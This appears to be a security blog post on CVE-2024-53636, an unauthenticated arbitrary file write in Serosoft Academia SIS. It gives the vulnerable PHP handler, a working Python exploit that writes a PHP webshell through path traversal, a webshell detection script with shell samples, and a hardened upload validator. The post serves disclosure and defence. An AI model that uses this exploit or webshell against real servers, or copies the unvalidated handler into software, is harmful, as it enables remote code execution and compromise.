CVE-2024-53636 is an arbitrary file write vulnerability, reported as an arbitrary file upload, in Serosoft's Academia Student Information System (SIS) EagleR-1.0.118. The writefile.php endpoint takes a client-supplied path and writes client-supplied content to it without any validation, which lets an unauthenticated attacker drop a PHP file under the web root and execute arbitrary code on the server. In this post, we walk through the vulnerable code, the exploit, and the references.
Vulnerability Details
The vulnerability exists in the writefile.php file of Serosoft Academia SIS EagleR-1.0.118. The filePath parameter of a POST request is passed straight to the filesystem, so an attacker can include double-dot (../) segments, or an absolute path, and choose exactly where on disk the request body is written.
The vulnerable code in writefile.php looks like this:
<?php
// Both values come straight from the request body; nothing constrains filePath.
$filePath = $_POST['filePath'];
$content = $_POST['content'];
if (!empty($filePath) && !empty($content)) {
    // Arbitrary file write: the client chooses the destination (including ../
    // segments and absolute paths) and the complete contents of the file.
    file_put_contents($filePath, $content);
    echo "File written successfully!";
} else {
    // Note that this error is still returned with HTTP status 200.
    echo "Error: Missing filePath or content.";
}
?>
As can be seen from the snippet, file_put_contents() is called with the user-supplied $filePath as the destination and $content as the data. The only check is that both values are non-empty: there is no allowlisted directory, no path canonicalisation, no extension check, and no authentication. A relative path is resolved against the working directory of the PHP process, so ../ segments walk out of that directory, and an absolute path is honoured as-is. Writing a file whose name ends in .php into any directory the web server serves, or overwriting an existing PHP file of the application, turns the file write into remote code execution.
Exploit Details
To exploit the vulnerability, an attacker sends a single HTTP POST request that writes a PHP file into a web-served directory. The path is interpreted relative to the PHP process's working directory, so the attacker needs to know or guess where a writable, web-served directory sits relative to it. A Python script example:
import requests

# writefile.php answers HTTP 200 even for its own error message, so only the
# response body tells us whether the write happened.
target_url = "http://example.com/academia/writefile.php"
# Resolved against the working directory of the PHP process, not the URL path.
file_path = "../uploads/malicious.php"
content = "<?php echo system($_GET['cmd']); ?>"
data = {
    'filePath': file_path,
    'content': content,
}
response = requests.post(target_url, data=data)
if response.status_code == 200 and "File written successfully" in response.text:
    print("File uploaded!")
else:
    print("Error uploading file.")
With this script, an attacker writes a PHP webshell to the server. They then request the new file over HTTP (for example /uploads/malicious.php) with the command to run in the 'cmd' query parameter, and the command executes with the privileges of the web server process. Because the write is arbitrary, an attacker who does not know a web-served directory can instead overwrite one of the application's own PHP files with the same effect.
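Added example, not part of the original post and not Serosoft's code: the artifact this exploit leaves behind is PHP code sitting in a directory that should only ever hold user data, so a responder can hunt for it. The script below walks a web root, looks inside directories whose name marks them as upload locations, and flags files that either carry a PHP-executable extension or contain a PHP open tag regardless of extension (a shell hidden behind a .jpg name). The directory names, the extension list and the sample web root are assumptions constructed for the example, not the Academia SIS layout.

```python
import os
import re
import tempfile
from pathlib import Path

# Directory names that should only contain user-supplied data, never server-side
# code. Assumed for this example; map them to the real deployment before use.
UPLOAD_DIRS = ("uploads", "files", "attachments")

# Extensions the PHP SAPI is commonly configured to execute.
PHP_EXTENSIONS = {".php", ".php5", ".php7", ".phtml", ".phar"}

# Content markers: a PHP open tag, and the execution primitives webshells rely on.
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)
SHELL_PRIMITIVES = re.compile(
    rb"\b(system|exec|passthru|shell_exec|popen|proc_open|eval)\s*\(", re.IGNORECASE
)


def looks_like_php(data: bytes) -> bool:
    """True if the bytes contain a PHP open tag anywhere."""
    return PHP_TAG.search(data) is not None


def find_suspicious_files(webroot: str) -> list:
    """Return (relative path, reason) for files inside upload directories that
    have a PHP extension or contain PHP code; reason is suffixed with
    '+exec-primitive' when a command-execution call is present."""
    hits = []
    root = Path(webroot)
    for dirpath, _dirs, files in os.walk(root):
        rel_dir = Path(dirpath).relative_to(root)
        if not any(part in UPLOAD_DIRS for part in rel_dir.parts):
            continue
        for name in files:
            p = Path(dirpath) / name
            try:
                head = p.read_bytes()[:65536]   # first 64 KiB is enough for a tag
            except OSError:
                continue
            reason = None
            if p.suffix.lower() in PHP_EXTENSIONS:
                reason = "php-extension"
            elif looks_like_php(head):
                reason = "php-content"
            if reason:
                if SHELL_PRIMITIVES.search(head):
                    reason += "+exec-primitive"
                hits.append((str(p.relative_to(root)), reason))
    return sorted(hits)


def build_sample_webroot() -> str:
    """Constructed sample tree (not real Academia data): a benign upload, the shell
    the exploit above drops, and a shell disguised with an image extension."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    (root / "uploads").mkdir()
    # Legitimate application code lives outside the upload directory and is ignored.
    (root / "index.php").write_bytes(b"<?php echo 'app'; ?>")
    (root / "uploads" / "transcript.pdf").write_bytes(b"%PDF-1.4 sample")
    (root / "uploads" / "malicious.php").write_bytes(b"<?php echo system($_GET['cmd']); ?>")
    (root / "uploads" / "photo.jpg").write_bytes(b"\xff\xd8\xff<?php eval($_POST['x']); ?>")
    return str(root)


if __name__ == "__main__":
    for path, reason in find_suspicious_files(build_sample_webroot()):
        print(f"{reason:30s} {path}")
```

Run it against the real document root of an Academia SIS instance rather than the constructed tree; any hit in an upload directory warrants a look at the file's modification time and the web server access log for the first request to it.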
Original References
The issue is tracked as CVE-2024-53636. For more information, see the following:
- Serosoft Security Advisory
- CVE-2024-53636 Details: https://www.cve.org/CVERecord?id=CVE-2024-53636
- National Vulnerability Database Entry for CVE-2024-53636: https://nvd.nist.gov/vuln/detail/CVE-2024-53636
Conclusion
CVE-2024-53636 is a serious vulnerability in the Serosoft Academia Student Information System (SIS) EagleR-1.0.118: an unauthenticated arbitrary file write that becomes remote code execution as soon as the attacker targets a web-served directory. Users of the Serosoft Academia SIS should update to the latest software version, which contains a fix for the vulnerability, and should also check upload directories and application files for PHP code that does not belong there. For developers, the lesson is that a client must never choose where a file lands on disk: the server should pick the directory and the stored name, allowlist the extension, and verify the canonicalised path still lies inside the intended directory before writing.
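Added example, not from the original post and not Serosoft's code: a Python rendition of the two behaviours side by side. vulnerable_target() does what writefile.php does, resolving the client string against the process working directory; safe_upload_path() is the hardened handler, which never lets the client pick a directory, allowlists the extension, chooses the stored name itself and still confirms the resolved path is inside the upload root. The upload root, the extension allowlist, the file-name pattern and the scratch web root are assumptions for the example; the Academia SIS is PHP, so the same checks would be ported to the PHP handler.

```python
import re
import secrets
import tempfile
from pathlib import Path, PurePosixPath

# Policy assumed for this example (not taken from Serosoft's code): the server
# chooses the on-disk name, only these extensions are accepted, and the file
# must end up inside the configured upload directory.
ALLOWED_EXTENSIONS = {".pdf", ".png", ".jpg", ".jpeg", ".docx"}
# One base name, one dot, one short extension: rules out "shell.php.jpg" too.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_-]{0,99}\.[A-Za-z0-9]{1,5}$")


class UnsafePath(ValueError):
    """Raised when a client-supplied file name fails validation."""


def vulnerable_target(cwd: str, client_path: str) -> Path:
    """What writefile.php does: the client string goes straight to the filesystem,
    resolved against the PHP process's working directory, so '../' walks out of
    whatever directory the developer had in mind."""
    return (Path(cwd) / client_path).resolve()


def safe_upload_path(upload_root: str, client_name: str) -> Path:
    """Hardened replacement for the filePath handling."""
    root = Path(upload_root).resolve()
    if "\x00" in client_name:
        raise UnsafePath("NUL byte in file name")
    # Keep only the last path component (either separator) and insist the client
    # sent nothing but that component: no directories, no '..'.
    name = PurePosixPath(client_name.replace("\\", "/")).name
    if name != client_name or not SAFE_NAME.match(name):
        raise UnsafePath(f"file name rejected: {client_name!r}")
    ext = Path(name).suffix.lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise UnsafePath(f"extension rejected: {ext}")
    # The server picks the stored name; the client's name is at most metadata.
    target = (root / (secrets.token_hex(16) + ext)).resolve()
    if root not in target.parents:   # belt and braces: still inside the upload root
        raise UnsafePath("resolved path escaped upload root")
    return target


def write_upload(upload_root: str, client_name: str, content: bytes) -> Path:
    """Validate, then write; returns the path actually used."""
    target = safe_upload_path(upload_root, client_name)
    target.parent.mkdir(parents=True, exist_ok=True)
    target.write_bytes(content)
    return target


def demo() -> dict:
    """Run both handlers against the exploit payload from this post, plus a few
    variants, inside a scratch web root constructed for the example."""
    webroot = Path(tempfile.mkdtemp(prefix="webroot-"))
    app_dir = webroot / "academia"      # where writefile.php would run
    uploads = webroot / "uploads"       # the intended upload directory
    app_dir.mkdir()
    uploads.mkdir()
    payload = "../uploads/malicious.php"
    vuln = vulnerable_target(str(app_dir), payload)
    results = {
        "vulnerable_writes_outside_app_dir": app_dir.resolve() not in vuln.parents,
        "vulnerable_target": str(vuln),
    }
    for name in (payload, "..\\..\\evil.pdf", "shell.php", "shell.php.jpg",
                 "bad\x00.pdf", "transcript.pdf"):
        try:
            stored = write_upload(str(uploads), name, b"constructed content")
            results[name] = f"stored as {stored.name}"
        except UnsafePath as e:
            results[name] = f"rejected: {e}"
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key!r}: {value}")
```

Only transcript.pdf is written, under a random server-chosen name, while the traversal payload from the exploit, the Windows-separator variant, a bare .php name and a double extension are all refused before anything touches the disk.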
Timeline
Published on: 04/26/2025 15:15:44 UTC
Last modified on: 04/29/2025 16:15:29 UTC